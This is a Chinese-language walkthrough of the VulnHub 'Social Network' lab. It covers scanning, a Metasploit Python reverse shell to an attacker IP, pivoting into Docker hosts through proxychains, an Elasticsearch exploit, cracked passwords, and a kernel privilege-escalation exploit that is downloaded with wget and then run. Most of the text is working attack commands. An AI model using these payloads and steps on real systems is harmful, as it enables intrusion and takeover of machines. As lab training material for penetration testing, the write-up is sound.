medium_socnet靶场实战

https://www.vulnhub.com/entry/boredhackerblog-social-network,454/

nmap -sP 192.168.128.0/24  #对自己的靶机网段进行存活探测，获取靶机地址nmap -T4 -A -p- 192.168.128.138  #对目标进行全端口扫描

通过端口扫描发现5000端口是一个web服务通过对页面进行测试，发现只有一个简单的输入框，没有可以利用的地方使用dirsearch对目标进行目录扫描python dirsearch.py -u http://192.168.128.138:5000 -e *通过目录扫描发现以下目录：http://192.168.128.138:5000/admin

查看到页面可以使用exec()函数执行命令通过msf生成python反弹shell的脚本msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.128.133 LPORT=3333 -f raw > shell.py          使用msf进行监听use exploit/multi/handler set payload python/meterpreter/reverse_tcpset lhost 192.168.128.133set lport 3333run开启监听后，将shell.py里面的内容复制到网站上执行成功获取shell

通过对获取的主机发现，此主机为docker环境docker环境检查方法：# 检查根目录下是否存在.dockerenv文件ls /.dockerenv# 检查/proc/1/cgroup是否存在还有docker字符串cat /proc/1/cgroup通过ping命令探测，是否还有其他主机for i in $(seq 254); do ping -c 1 172.17.0.$i | grep "ttl";done扫描后发现只有172.17.0.1、172.17.0.2、172.17.0.3 是可以ping通的

将流量代理出来，对存活主机进行端口扫描run autoroute -s 172.17.0.0/24 #创建跳板路由bg  #退出当前会话use auxiliary/server/socks_proxy run运行后修改：proxychains配置文件vim /etc/proxychains.conf对内网目标进行端口扫描proxychains nmap -Pn -sT -sV 172.17.0.1proxychains nmap -Pn -sT -sV 172.17.0.2proxychains nmap -Pn -sT -sV 172.17.0.3通过扫描发现172.17.0.1和172.17.0.2开启的服务相同172.17.0.3开启了9200 ElasticSearch服务

# 搜索Elasticsearch利用程序searchsploit Elasticsearchsearchsploit -m 36337  #下载到当前目录proxychains python2 36337.py 172.17.0.3运行exp脚本后成功获取shell

通过当前获取的权限，对当前主机进行信息搜集，发现passwords文件中存放了账户与加密后的密码密码解密后：john:1337hacktest:1234testadmin:1111passroot:1234passjane:1234jane通过登录测试，只有john:1337hack可成功登录目标宿主机192.168.128.138ssh john@192.168.128.138

进行提权，拿下主机root权限uname -a #查看主机内核版本searchsploit 3.13.0

由于靶机没有gcc，且查看37292.c脚本发现，还需编译ofs-lib.so文件。所以考虑把ofs-lib.so文件从lib文件复制出，并注释掉37292.c相关代码再编译，并将编译后的文件和ofs-lib.so共同上传目标靶机locate ofs-lib.so # 查找文件vim 37292.c删除 139-147行代码后本地进行编译gcc -o exp 37292.c远程下载exp和ofs-lib.so文件到靶机/tmp目录下wget http://192.168.128.133:8088/expwget http://192.168.128.133:8088/ofs-lib.sochmod +x exp # 赋予程序程序权限./exp # 执行程序成功获取到shell